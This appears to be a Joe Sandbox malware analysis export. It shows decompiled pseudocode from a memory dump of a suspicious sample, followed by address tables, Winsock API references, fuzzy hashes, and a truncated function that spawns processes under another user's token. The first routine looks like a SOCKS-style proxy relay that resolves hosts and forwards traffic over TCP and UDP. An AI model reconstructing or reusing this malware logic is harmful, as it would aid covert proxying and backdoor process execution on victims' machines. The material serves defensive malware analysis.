											if( *_t505 != 0x17) {
												_t239 = _t505 + 4;
												 *_t239 =  *(_t505 + 4) & 0;
												__eflags =  *_t239;
											} else {
												_t238 = _t505 + 8; // 0x8
												L012B19F6(_t238, _t402);
											}
											_t299 = L012B187A(_t505, 1);
											 *(_t510 + 0x60) = _t299;
											__eflags = _t299 - _t493;
											if(_t299 == _t493) {
												goto L134;
											} else {
												_push( *(_t510 + 0x50));
												_push(0);
												_push(_t299);
												_push( *((intOrPtr*)(_t510 + 0x70)));
												_t507 = E012C9668();
												__eflags = _t507 - 1;
												if(_t507 != 1) {
													_t422 =  *(_t510 + 0x60);
													L130:
													L012B1B22(_t300, _t422);
													__eflags = _t507 - 0xffffffff;
													if(_t507 == 0xffffffff) {
														L119:
														 *((char*)(_t510 + 0x6c)) = 1;
														goto L142;
													}
													__eflags = _t507 - 1;
													if(_t507 != 1) {
														 *(_t510 + 0x77) = 0;
													}
													goto L142;
												}
												_t494 = L012B17D0(_t510 + 0x60, 1, 0, 0, 0, _t510 + 0x70, _t300);
												L012B1B22(_t303,  *(_t510 + 0x60));
												__eflags = _t494 - 0xffffffff;
												if(_t494 == 0xffffffff) {
													goto L119;
												}
												L012B17B2(_t494, 1);
												_push( *(_t510 + 0x50) | 0x00000002);
												_push(0);
												_push(_t494);
												_push( *((intOrPtr*)(_t510 + 0x70)));
												_t507 = E012C9668();
												__eflags = _t507 - 1;
												if(_t507 == 1) {
													_t300 = L012B108C( *((intOrPtr*)(_t510 + 0x70)), _t494);
												}
												_t422 = _t494;
												goto L130;
											}
										}
										__eflags = _t297 == 1;
										if(_t297 == 1) {
											 *(_t510 + 0x2c) = 0x80;
											 *(_t510 + 0x24) = 0x80;
											_t312 = _t510 - 0x5c;
											__imp__#6( *((intOrPtr*)(_t510 + 0x70)), _t312, _t510 + 0x2c);
											__eflags = _t312;
											if(_t312 != 0) {
												goto L119;
											}
											_t314 = _t510 - 0x370;
											__imp__#5( *((intOrPtr*)(_t510 + 0x70)), _t314, _t510 + 0x24);
											__eflags = _t314;
											if(_t314 != 0) {
												goto L119;
											}
											__eflags =  *(_t510 - 0x5c) - 0x17;
											 *(_t510 - 0x5a) = _t314;
											if( *(_t510 - 0x5c) == 0x17) {
												 *(_t510 - 0x44) =  *(_t510 - 0x44) & _t314;
												_t99 = _t510 - 0x58;
												 *_t99 =  *(_t510 - 0x58) & _t314;
												__eflags =  *_t99;
											}
											_t315 = E012B1929(_t510 - 0x5c);
											 *((intOrPtr*)(_t510 + 0x58)) = _t315;
											__eflags = _t315 - _t493;
											if(_t315 == _t493) {
												goto L119;
											} else {
												_t403 = 0xffff;
												_t509 = L012B1C17(0xffff);
												__eflags = _t509;
												if(_t509 != 0) {
													_push( *(_t510 + 0x50));
													_push(0);
													_push( *((intOrPtr*)(_t510 + 0x58)));
													_push( *((intOrPtr*)(_t510 + 0x70)));
													_t316 = E012C9668();
													__eflags = _t316 - 1;
													if(_t316 != 1) {
														__eflags = _t316 - _t493;
														if(_t316 != _t493) {
															 *(_t510 + 0x77) = 0;
														} else {
															 *((char*)(_t510 + 0x6c)) = 1;
														}
														L117:
														_t295 = L012B1933(_t509);
														L118:
														_t419 =  *((intOrPtr*)(_t510 + 0x58));
														goto L141;
													}
													_t317 = 0;
													 *((intOrPtr*)(_t510 - 0x16c)) =  *((intOrPtr*)(_t510 + 0x70));
													 *((intOrPtr*)(_t510 - 0x168)) =  *((intOrPtr*)(_t510 + 0x58));
													 *(_t510 + 0x5c) = _t493;
													 *(_t510 + 0x38) = 0;
													 *(_t510 + 0x54) = 0;
													 *(_t510 + 0x60) = 0;
													 *((intOrPtr*)(_t510 - 0x170)) = 2;
													 *(_t510 - 0x164) = _t493;
													__imp__#18(0, _t510 - 0x170, 0, 0, 0);
													__eflags = 0;
													if(0 <= 0) {
														L113:
														L012B1B22(_t317,  *(_t510 + 0x5c));
														goto L117;
													}
													while(1) {
														_t317 = L012B1BEF( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x170);
														__eflags = _t317;
														if(_t317 == 0) {
															goto L61;
														}
														__imp__#16( *((intOrPtr*)(_t510 + 0x70)), _t509, _t403, 0);
														__eflags = _t317;
														if(_t317 <= 0) {
															goto L113;
														}
														L61:
														 *(_t510 + 0x68) = 0x80;
														_t319 = L012B1BEF( *((intOrPtr*)(_t510 + 0x58)), _t510 - 0x170);
														__eflags = _t319;
														if(_t319 == 0) {
															L103:
															__eflags =  *(_t510 + 0x5c) - 0xffffffff;
															if( *(_t510 + 0x5c) == 0xffffffff) {
																L112:
																_t320 =  *(_t510 + 0x5c);
																__eflags = _t320 - 0xffffffff;
																 *(_t510 - 0x164) = _t320;
																_t317 = 0;
																 *((intOrPtr*)(_t510 - 0x170)) = (0 | _t320 != 0xffffffff) + 2;
																 *((intOrPtr*)(_t510 - 0x16c)) =  *((intOrPtr*)(_t510 + 0x70));
																 *((intOrPtr*)(_t510 - 0x168)) =  *((intOrPtr*)(_t510 + 0x58));
																__imp__#18(0, _t510 - 0x170, 0, 0, 0);
																__eflags = 0;
																if(0 > 0) {
																	_t403 = 0xffff;
																	continue;
																}
																goto L113;
															}
															_t321 = L012B1BEF( *(_t510 + 0x5c), _t510 - 0x170);
															__eflags = _t321;
															if(_t321 == 0) {
																goto L112;
															}
															_t404 =  *(_t510 + 0x38);
															_t326 = _t404 + _t509;
															__imp__#17( *(_t510 + 0x5c), _t326, 0xffff - _t404, 0, _t510 - 0x5c, _t510 + 0x68);
															_t496 = _t326;
															__eflags = _t496;
															if(_t496 > 0) {
																L107:
																 *_t509 = 0;
																 *((char*)(_t509 + 2)) = 0;
																 *(_t510 - 0x5c) - 0x17 =  *(_t510 + 0x54) - 0x17;
																 *(_t509 + 3) = ((0 |  *(_t510 - 0x5c) != 0x00000017) - 0x00000001 & 0x00000003) + 1;
																if( *(_t510 + 0x54) != 0x17) {
																	__eflags =  *(_t510 + 0x54) - 2;
																	if( *(_t510 + 0x54) != 2) {
																		goto L112;
																	}
																	_push(4);
																	_t332 = _t510 - 0x58;
																	L111:
																	_t215 = _t509 + 4; // 0x4
																	L012B1947();
																	L012B1947(_t404 + _t509 - 2, _t510 - 0x5a, 2);
																	_t497 = _t496 + _t404;
																	__eflags = _t497;
																	__imp__#20( *((intOrPtr*)(_t510 + 0x58)), _t509, _t497, 0, _t510 - 0x1f0,  *(_t510 + 0x60), _t215, _t332);
																	goto L112;
																}
																_push(0x10);
																_t332 = _t510 - 0x54;
																goto L111;
															}
															__eflags =  *(_t510 + 0x54) - ( *(_t510 - 0x5c) & 0x0000ffff);
															if( *(_t510 + 0x54) != ( *(_t510 - 0x5c) & 0x0000ffff)) {
																goto L112;
															}
															goto L107;
														}
														_t317 = _t510 - 0x5c;
														__imp__#17( *((intOrPtr*)(_t510 + 0x58)), _t509, _t403, 0, _t317, _t510 + 0x68);
														_t405 = _t317;
														__eflags = _t405;
														if(_t405 <= 0) {
															goto L113;
														}
														__eflags = _t405 - 6;
														if(_t405 < 6) {
															goto L103;
														}
														_t341 =  *(_t510 - 0x5c);
														__eflags =  *(_t510 - 0x370) - _t341;
														if( *(_t510 - 0x370) != _t341) {
															goto L103;
														}
														__eflags = _t341 - 2;
														if(_t341 != 2) {
															__eflags = _t341 - 0x17;
															if(_t341 != 0x17) {
																L70:
																__eflags =  *((char*)(_t509 + 2));
																if( *((char*)(_t509 + 2)) != 0) {
																	goto L103;
																}
																__eflags =  *_t509;
																if( *_t509 != 0) {
																	goto L103;
																}
																__eflags =  *(_t510 + 0x60);
																if( *(_t510 + 0x60) == 0) {
																	L012B1947(_t510 - 0x1f0, _t510 - 0x5c,  *(_t510 + 0x68));
																	__eflags =  *((short*)(_t510 - 0x1f0)) - 0x17;
																	if( *((short*)(_t510 - 0x1f0)) == 0x17) {
																		 *((intOrPtr*)(_t510 - 0x1d8)) = 0;
																		 *((intOrPtr*)(_t510 - 0x1ec)) = 0;
																	}
																	 *(_t510 + 0x60) =  *(_t510 + 0x68);
																}
																L012B19F6(_t510 - 0x5c, 0x80);
																_t344 = ( *(_t509 + 3) & 0x000000ff) - 1;
																__eflags = _t344;
																if(_t344 == 0) {
																	__eflags = _t405 - 0xa;
																	if(_t405 <= 0xa) {
																		goto L103;
																	}
																	_t345 = 2;
																	 *(_t510 - 0x5c) = _t345;
																	_t175 = _t509 + 4; // 0x4
																	 *(_t510 + 0x68) = 0x10;
																	L012B1947(_t510 - 0x58, _t175, 4);
																	_push(8);
																	goto L96;
																} else {
																	_t361 = _t344;
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_t362 =  *((intOrPtr*)(_t509 + 4));
																		__eflags = _t362;
																		if(_t362 == 0) {
																			goto L103;
																		}
																		_t501 = _t362 & 0x000000ff;
																		_t150 = _t501 + 7; // 0x7
																		__eflags = _t405 - _t150;
																		if(_t405 <= _t150) {
																			goto L103;
																		}
																		_t151 = _t509 + 5; // 0x5
																		L012B1947(_t510 - 0x2f0, _t151, _t501);
																		 *(_t510 + 0x4c) = 0;
																		_t368 = _t510 - 0x2f0;
																		 *((char*)(_t510 + _t501 - 0x2f0)) = 0;
																		_t498 = _t501 + 5;
																		__imp__getaddrinfo(_t368, 0, 0, _t510 + 0x4c);
																		__eflags = _t368;
																		if(_t368 != 0) {
																			goto L103;
																		}
																		_t483 = 0;
																		__eflags = 0;
																		do {
																			_t369 =  *(_t510 + 0x4c);
																			__eflags = _t369;
																			if(_t369 == 0) {
																				goto L89;
																			}
																			_t449 =  *((intOrPtr*)(_t510 + 0x30 + (_t483 & 0x000000ff) * 4));
																			while(1) {
																				__eflags =  *((intOrPtr*)(_t369 + 4)) - _t449;
																				if( *((intOrPtr*)(_t369 + 4)) == _t449) {
																					break;
																				}
																				_t369 =  *(_t369 + 0x1c);
																				__eflags = _t369;
																				if(_t369 != 0) {
																					continue;
																				}
																				goto L89;
																			}
																			 *(_t510 + 0x68) =  *(_t369 + 0x10);
																			L012B1947(_t510 - 0x5c,  *((intOrPtr*)(_t369 + 0x18)),  *(_t369 + 0x10));
																			__eflags =  *(_t510 - 0x5c) - 0x17;
																			if( *(_t510 - 0x5c) == 0x17) {
																				 *(_t510 - 0x44) =  *(_t510 - 0x44) & 0x00000000;
																				_t171 = _t510 - 0x58;
																				 *_t171 =  *(_t510 - 0x58) & 0x00000000;
																				__eflags =  *_t171;
																			}
																			__imp__freeaddrinfo( *(_t510 + 0x4c));
																			L97:
																			_t499 = _t498 + 2;
																			__eflags =  *(_t510 + 0x5c) - 0xffffffff;
																			 *(_t510 - 0x5a) =  *((intOrPtr*)(_t498 + _t509));
																			if( *(_t510 + 0x5c) != 0xffffffff) {
																				L100:
																				__eflags = _t405 - _t499;
																				if(_t405 > _t499) {
																					__eflags =  *(_t510 + 0x54) - ( *(_t510 - 0x5c) & 0x0000ffff);
																					if( *(_t510 + 0x54) == ( *(_t510 - 0x5c) & 0x0000ffff)) {
																						_t500 = _t499 + _t509;
																						__eflags = _t500;
																						__imp__#20( *(_t510 + 0x5c), _t500, _t405 - _t499, 0, _t510 - 0x5c,  *(_t510 + 0x68));
																					}
																				}
																				goto L103;
																			}
																			L012B19F6(_t510 - 0x270, 0x80);
																			_t353 =  *(_t510 - 0x5c);
																			 *(_t510 - 0x270) = _t353;
																			 *(_t510 + 0x54) = _t353 & 0x0000ffff;
																			_t317 = E012B1929(_t510 - 0x270);
																			 *(_t510 + 0x5c) = _t317;
																			__eflags = _t317 - 0xffffffff;
																			if(_t317 == 0xffffffff) {
																				goto L113;
																			}
																			__eflags =  *(_t510 + 0x54) - 0x17;
																			_t359 = ((0 |  *(_t510 + 0x54) != 0x00000017) - 0x00000001 & 0x0000000c) + 0xa;
																			__eflags = _t359;
																			 *(_t510 + 0x38) = _t359;
																			goto L100;
																			L89:
																			_t483 = _t483 + 1;
																			__eflags = _t483 - 2;
																		} while (_t483 < 2);
																		goto L103;
																	}
																	__eflags = _t361 != 1;
																	if(_t361 != 1) {
																		goto L103;
																	}
																	__eflags = _t405 - 0x16;
																	if(_t405 <= 0x16) {
																		goto L103;
																	}
																	_t373 = 0x17;
																	 *(_t510 - 0x5c) = _t373;
																	_t146 = _t509 + 4; // 0x4
																	 *(_t510 + 0x68) = 0x1c;
																	L012B1947(_t510 - 0x54, _t146, 0x10);
																	_push(0x14);
																	L96:
																	_pop(_t498);
																	goto L97;
																}
															}
															__eflags = L012B1735(_t510 - 0x368, _t510 - 0x54, 0x10);
															L69:
															if(__eflags != 0) {
																goto L103;
															}
															goto L70;
														}
														__eflags =  *((intOrPtr*)(_t510 - 0x36c)) -  *(_t510 - 0x58);
														goto L69;
													}
												}
												 *((char*)(_t510 + 0x6c)) = 1;
												goto L118;
											}
										}
										 *((char*)(_t510 + 0x6c)) = 7;
										goto L142;
									}
									L012B1933(_t505);
									goto L41;
								}
								L36:
								 *((char*)(_t510 + 0x6c)) = 1;
								goto L39;
							}
							_t384 = _t280 - _t492;
							__eflags = _t384;
							if(_t384 == 0) {
								_t385 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x67, 1,  *(_t510 + 0x68));
								__eflags = _t385;
								if(_t385 == 0) {
									goto L41;
								}
								__eflags =  *(_t510 + 0x67);
								if( *(_t510 + 0x67) == 0) {
									goto L41;
								}
								_t387 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x470,  *(_t510 + 0x67) & 0x000000ff,  *(_t510 + 0x68));
								__eflags = _t387;
								if(_t387 == 0) {
									goto L41;
								}
								 *((char*)(_t510 + ( *(_t510 + 0x67) & 0x000000ff) - 0x470)) = 0;
								 *(_t510 + 0x44) = 0;
								_t390 = _t510 - 0x470;
								__imp__getaddrinfo(_t390, 0, 0, _t510 + 0x44);
								__eflags = _t390;
								if(_t390 == 0) {
									_t487 = 0;
									__eflags = 0;
									do {
										_t391 =  *(_t510 + 0x44);
										__eflags = _t391 - _t505;
										if(_t391 != _t505) {
											_t457 =  *((intOrPtr*)(_t510 + 0x30 + (_t487 & 0x000000ff) * 4));
											while(1) {
												__eflags =  *((intOrPtr*)(_t391 + 4)) - _t457;
												if( *((intOrPtr*)(_t391 + 4)) == _t457) {
													break;
												}
												_t391 =  *(_t391 + 0x1c);
												__eflags = _t391;
												if(_t391 != 0) {
													continue;
												}
												goto L27;
											}
											_t505 = L012B142E( *((intOrPtr*)(_t391 + 0x18)),  *((intOrPtr*)(_t391 + 0x10)));
											 *(_t510 + 0x48) = _t505;
											__eflags = _t505;
											if(_t505 != 0) {
												__eflags =  *_t505 - 0x17;
												if( *_t505 == 0x17) {
													 *(_t505 + 0x18) =  *(_t505 + 0x18) & 0x00000000;
													 *(_t505 + 4) =  *(_t505 + 4) & 0x00000000;
												}
											} else {
												 *((char*)(_t510 + 0x6c)) = 1;
											}
											L29:
											__imp__freeaddrinfo( *(_t510 + 0x44));
											goto L39;
										}
										L27:
										_t487 = _t487 + 1;
										__eflags = _t487 - 2;
									} while (_t487 < 2);
									 *((char*)(_t510 + 0x6c)) = 4;
									goto L29;
								} else {
									 *((char*)(_t510 + 0x6c)) = 4;
									goto L39;
								}
							}
							__eflags = _t384 != 1;
							if(_t384 != 1) {
								goto L41;
							}
							_t394 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x6c, _t402,  *(_t510 + 0x68));
							__eflags = _t394;
							if(_t394 == 0) {
								goto L41;
							}
							_t460 = 0x1c;
							_t505 = L012B1C17(_t460);
							 *(_t510 + 0x48) = _t505;
							__eflags = _t505;
							if(_t505 == 0) {
								goto L36;
							} else {
								_t396 = 0x17;
								 *_t505 = _t396;
								_push(_t402);
								_push(_t510 - 0x6c);
								_t39 = _t505 + 8; // 0x8
								_t285 = _t39;
								goto L38;
							}
						}
					} else {
						_t268 = 1;
						L42:
						return _t268;
					}
				}
			}

0x012c976e
0x012c977b
0x012c977e
0x012c9792
0x012c979a
0x012c97a4
0x012c99e1
0x012c99e1
0x012c99e1
0x00000000
0x012c97d2
0x012c97df
0x012c97e9
0x012c97fc
0x012c9801
0x012c980b
0x00000000
0x00000000
0x012c9815
0x012c9829
0x012c982d
0x012c9832
0x012c9834
0x00000000
0x00000000
0x012c983a
0x012c983e
0x00000000
0x012c9844
0x012c9844
0x012c9847
0x012c9855
0x012c9858
0x012c9849
0x012c9849
0x012c9850
0x012c9850
0x012c9863
0x012c9865
0x012c9865
0x012c9868
0x012c986b
0x012c986c
0x012c9994
0x012c9999
0x012c999b
0x00000000
0x00000000
0x012c99a4
0x012c99a6
0x012c99a9
0x012c99ab
0x012c99b5
0x012c99bb
0x012c99bd
0x012c99be
0x012c99be
0x012c99c1
0x012c99c1
0x012c99c2
0x012c99c7
0x012c99d1
0x012c99d6
0x012c99d8
0x012c99eb
0x012c99ee
0x012c99f2
0x012c99f6
0x012c9fd2
0x012c9fd5
0x012c9fda
0x012c9fdd
0x012c9fdf
0x012c9fe5
0x012c9fe9
0x012c9fef
0x012c9ff2
0x012c9ff5
0x012c9ff7
0x012c9ffa
0x012c9fff
0x012ca001
0x012ca001
0x012c9fe9
0x00000000
0x012c9fdf
0x012c9a00
0x012c9a08
0x012c9a08
0x012c9a09
0x012c9f89
0x012c9f8b
0x012c9f8d
0x012c9f99
0x012c9f9e
0x012c9fa1
0x012c9fa3
0x012c9fa4
0x012c9fa7
0x012c9fac
0x012c9faf
0x012c9fbd
0x012c9fbf
0x012c9fc7
0x012c9fc1
0x012c9fc1
0x012c9fc1
0x012c9fb1
0x012c9fb6
0x012c9fb6
0x012c9fcb
0x012c9fcd
0x012c9fcd
0x00000000
0x012c9fcd
0x012c9f8f
0x012c9f8f
0x00000000
0x012c9f8f
0x012c9a0f
0x012c9a0f
0x012c9a10
0x012c9ed0
0x012c9ed4
0x012c9ed8
0x012c9ee6
0x012c9ee6
0x012c9ee6
0x012c9eda
0x012c9eda
0x012c9edf
0x012c9edf
0x012c9eee
0x012c9ef3
0x012c9ef6
0x012c9ef8
0x00000000
0x012c9efe
0x012c9efe
0x012c9f01
0x012c9f03
0x012c9f04
0x012c9f0c
0x012c9f0e
0x012c9f11
0x012c9f66
0x012c9f69
0x012c9f69
0x012c9f6e
0x012c9f71
0x012c9ec5
0x012c9ec5
0x00000000
0x012c9ec5
0x012c9f77
0x012c9f7a
0x012c9f7c
0x012c9f7c
0x00000000
0x012c9f7a
0x012c9f2b
0x012c9f2d
0x012c9f32
0x012c9f35
0x00000000
0x00000000
0x012c9f3b
0x012c9f46
0x012c9f47
0x012c9f48
0x012c9f49
0x012c9f51
0x012c9f53
0x012c9f56
0x012c9f5d
0x012c9f5d
0x012c9f62
0x00000000
0x012c9f62
0x012c9ef8
0x012c9a16
0x012c9a17
0x012c9a27
0x012c9a2a
0x012c9a31
0x012c9a38
0x012c9a3e
0x012c9a40
0x00000000
0x00000000
0x012c9a4a
0x012c9a54
0x012c9a5a
0x012c9a5c
0x00000000
0x00000000
0x012c9a62
0x012c9a67
0x012c9a6b
0x012c9a6d
0x012c9a70
0x012c9a70
0x012c9a70
0x012c9a70
0x012c9a76
0x012c9a7b
0x012c9a7e
0x012c9a80
0x00000000
0x012c9a86
0x012c9a86
0x012c9a92
0x012c9a94
0x012c9a96
0x012c9aa1
0x012c9aa4
0x012c9aa6
0x012c9aa9
0x012c9aac
0x012c9ab1
0x012c9ab4
0x012c9ea8
0x012c9eaa
0x012c9eb2
0x012c9eac
0x012c9eac
0x012c9eac
0x012c9eb6
0x012c9eb8
0x012c9ebd
0x012c9ebd
0x00000000
0x012c9ebd
0x012c9abd
0x012c9ac0
0x012c9aca
0x012c9ad9
0x012c9adc
0x012c9adf
0x012c9ae2
0x012c9ae5
0x012c9aef
0x012c9af5
0x012c9afb
0x012c9afd
0x012c9e9e
0x012c9ea1
0x00000000
0x012c9ea1
0x012c9b0a
0x012c9b13
0x012c9b18
0x012c9b1a
0x00000000
0x00000000
0x012c9b23
0x012c9b29
0x012c9b2b
0x00000000
0x00000000
0x012c9b31
0x012c9b3a
0x012c9b41
0x012c9b46
0x012c9b48
0x012c9da2
0x012c9da2
0x012c9da6
0x012c9e57
0x012c9e57
0x012c9e5c
0x012c9e62
0x012c9e68
0x012c9e70
0x012c9e79
0x012c9e82
0x012c9e90
0x012c9e96
0x012c9e98
0x012c9b05
0x00000000
0x012c9b05
0x00000000
0x012c9e98
0x012c9db5
0x012c9dba
0x012c9dbc
0x00000000
0x00000000
0x012c9dc2
0x012c9dd7
0x012c9dde
0x012c9de4
0x012c9de6
0x012c9de8
0x012c9df3
0x012c9df5
0x012c9df8
0x012c9e09
0x012c9e0d
0x012c9e10
0x012c9e19
0x012c9e1d
0x00000000
0x00000000
0x012c9e1f
0x012c9e21
0x012c9e24
0x012c9e25
0x012c9e29
0x012c9e39
0x012c9e4a
0x012c9e4a
0x012c9e51
0x00000000
0x012c9e51
0x012c9e12
0x012c9e14
0x00000000
0x012c9e14
0x012c9dee
0x012c9df1
0x00000000
0x00000000
0x00000000
0x012c9df1
0x012c9b52
0x012c9b5e
0x012c9b64
0x012c9b66
0x012c9b68
0x00000000
0x00000000
0x012c9b6e
0x012c9b71
0x00000000
0x00000000
0x012c9b77
0x012c9b7b
0x012c9b82
0x00000000
0x00000000
0x012c9b88
0x012c9b8c
0x012c9b99
0x012c9b9d
0x012c9bb7
0x012c9bb7
0x012c9bbb
0x00000000
0x00000000
0x012c9bc1
0x012c9bc4
0x00000000
0x00000000
0x012c9bca
0x012c9bcd
0x012c9bdd
0x012c9be2
0x012c9bea
0x012c9bec
0x012c9bf2
0x012c9bf2
0x012c9bfb
0x012c9bfb
0x012c9c06
0x012c9c0f
0x012c9c0f
0x012c9c10
0x012c9cf8
0x012c9cfb
0x00000000
0x00000000
0x012c9d03
0x012c9d04
0x012c9d0a
0x012c9d12
0x012c9d19
0x012c9d1e
0x00000000
0x012c9c16
0x012c9c17
0x012c9c17
0x012c9c18
0x012c9c4e
0x012c9c51
0x012c9c53
0x00000000
0x00000000
0x012c9c59
0x012c9c5c
0x012c9c5f
0x012c9c61
0x00000000
0x00000000
0x012c9c68
0x012c9c73
0x012c9c80
0x012c9c83
0x012c9c89
0x012c9c92
0x012c9c95
0x012c9c9b
0x012c9c9d
0x00000000
0x00000000
0x012c9ca3
0x012c9ca3
0x012c9ca5
0x012c9ca5
0x012c9ca8
0x012c9caa
0x00000000
0x00000000
0x012c9caf
0x012c9cb3
0x012c9cb3
0x012c9cb6
0x00000000
0x00000000
0x012c9cb8
0x012c9cbb
0x012c9cbd
0x00000000
0x00000000
0x00000000
0x012c9cbd
0x012c9ccf
0x012c9cd9
0x012c9cde
0x012c9ce3
0x012c9ce5
0x012c9ce9
0x012c9ce9
0x012c9ce9
0x012c9ce9
0x012c9cf0
0x012c9d21
0x012c9d25
0x012c9d28
0x012c9d2c
0x012c9d30
0x012c9d7d
0x012c9d7d
0x012c9d7f
0x012c9d85
0x012c9d88
0x012c9d96
0x012c9d96
0x012c9d9c
0x012c9d9c
0x012c9d88
0x00000000
0x012c9d7f
0x012c9d3d
0x012c9d42
0x012c9d46
0x012c9d56
0x012c9d59
0x012c9d5e
0x012c9d61
0x012c9d64
0x00000000
0x00000000
0x012c9d6c
0x012c9d77
0x012c9d77
0x012c9d7a
0x00000000
0x012c9cbf
0x012c9cbf
0x012c9cc1
0x012c9cc1
0x00000000
0x012c9cc6
0x012c9c1a
0x012c9c1b
0x00000000
0x00000000
0x012c9c21
0x012c9c24
0x00000000
0x00000000
0x012c9c2c
0x012c9c2d
0x012c9c33
0x012c9c3b
0x012c9c42
0x012c9c47
0x012c9d20
0x012c9d20
0x00000000
0x012c9d20
0x012c9c10
0x012c9baf
0x012c9bb1
0x012c9bb1
0x00000000
0x00000000
0x00000000
0x012c9bb1
0x012c9b94
0x00000000
0x012c9b94
0x012c9b0a
0x012c9a98
0x00000000
0x012c9a98
0x012c9a80
0x012c9a19
0x00000000
0x012c9a19
0x012c99dc
0x00000000
0x012c99dc
0x012c99ad
0x012c99ad
0x00000000
0x012c99ad
0x012c9872
0x012c9872
0x012c9874
0x012c98c7
0x012c98cc
0x012c98ce
0x00000000
0x00000000
0x012c98d4
0x012c98d8
0x00000000
0x00000000
0x012c98ef
0x012c98f4
0x012c98f6
0x00000000
0x00000000
0x012c9900
0x012c9910
0x012c9913
0x012c991a
0x012c9920
0x012c9922
0x012c992d
0x012c992d
0x012c992f
0x012c992f
0x012c9932
0x012c9934
0x012c9939
0x012c993d
0x012c993d
0x012c9940
0x00000000
0x00000000
0x012c9942
0x012c9945
0x012c9947
0x00000000
0x00000000
0x00000000
0x012c9947
0x012c996a
0x012c996c
0x012c996f
0x012c9971
0x012c9979
0x012c997d
0x012c997f
0x012c9983
0x012c9983
0x012c9973
0x012c9973
0x012c9973
0x012c9954
0x012c9957
0x00000000
0x012c9957
0x012c9949
0x012c9949
0x012c994b
0x012c994b
0x012c9950
0x00000000
0x012c9924
0x012c9924
0x00000000
0x012c9924
0x012c9922
0x012c9876
0x012c9877
0x00000000
0x00000000
0x012c9887
0x012c988c
0x012c988e
0x00000000
0x00000000
0x012c9896
0x012c989c
0x012c989e
0x012c98a1
0x012c98a3
0x00000000
0x012c98a9
0x012c98ab
0x012c98ac
0x012c98b2
0x012c98b3
0x012c98b4
0x012c98b4
0x00000000
0x012c98b4
0x012c98a3
0x012c9817
0x012c9817
0x012c99e3
0x012c99ea
0x012c99ea
0x012c9815

APIs

getsockname.WS2_32(?,?,?), ref: 012C9A38
getpeername.WS2_32(?,?,?), ref: 012C9A54
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 012C9AF5
recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 012C9B23
recvfrom.WS2_32(?,00000000,0000FFFF,00000000,?,?), ref: 012C9B5E
getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 012C9C95
freeaddrinfo.WS2_32(?,?,?,?), ref: 012C9CF0
sendto.WS2_32(?,00000006,00000000,00000000,?,?), ref: 012C9D9C
recvfrom.WS2_32(?,0000FFFF,0000FFFF,00000000,?,?), ref: 012C9DDE
sendto.WS2_32(?,00000000,00000000,00000000,?,?), ref: 012C9E51
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 012C9E90

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: recvfromselectsendto$freeaddrinfogetaddrinfogetpeernamegetsocknamerecv
String ID:
API String ID: 1548934455-0
Opcode ID: 623ba8c8ed545d2b69927adfc1598c27f64b09332f1b6c874dc431a10fe5fae4
Instruction ID: de16ed85a9293762c54642cdc4e5f2fe1cdc83d3c1805575beabbbf4e30b557f
Opcode Fuzzy Hash: 623ba8c8ed545d2b69927adfc1598c27f64b09332f1b6c874dc431a10fe5fae4
Instruction Fuzzy Hash: 1D42CF7192028A9BDF25DFA4C884BFE3BB9BF04748F10421EEB5597291E771C985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012BBAD7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 106
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E012BBAD7(void* __ecx, intOrPtr __edx, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, struct _STARTUPINFOW* _a16, intOrPtr _a20) {
				struct _SECURITY_ATTRIBUTES* _v5;
				char _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				void* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;
				struct _PROCESS_INFORMATION _v44;
				intOrPtr _v104;
				char _v112;
				struct HINSTANCE__* _t35;
				void* _t41;
				struct _STARTUPINFOW* _t57;
				WCHAR* _t59;
				char _t60;
				intOrPtr* _t62;
				intOrPtr* _t68;

				_v28 = __edx;
				_v20 = __ecx;
				_v5 = 0;
				_t35 = LoadLibraryA("userenv.dll");
				_v24 = _t35;
				if(_t35 != 0) {
					_t62 = GetProcAddress(_t35, "CreateEnvironmentBlock");
					_t68 = GetProcAddress(_v24, "DestroyEnvironmentBlock");
					if(_t62 != 0 && _t68 != 0) {
						_v16 = 0;
						_t41 =  *_t62( &_v16, _v20, 0);
						if(_t41 != 0) {
							_t41 = _v16;
						} else {
							_v16 = _t41;
						}
						_v12 = 0;
						_t57 = _a16;
						if(_t57 == 0) {
							_t60 = 0x44;
							L012B15F5( &_v112,  &_v112, 0, _t60);
							_v104 = _v28;
							_t41 = _v16;
							_v112 = _t60;
							_t57 =  &_v112;
						}
						_t59 = _a8;
						if(_t59 == 0) {
							_t59 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_v20, _a4, _t59, 0, 0, 0,  ~_t41 & 0x00000400 | 0x04000000, _t41, _a12, _t57,  &_v44) != 0) {
							if(_a20 == 0) {
								CloseHandle(_v44.hThread);
								CloseHandle(_v44);
							} else {
								L012B1947(_a20,  &_v44, 0x10);
							}
							_v5 = _v44.dwProcessId != 0;
						}
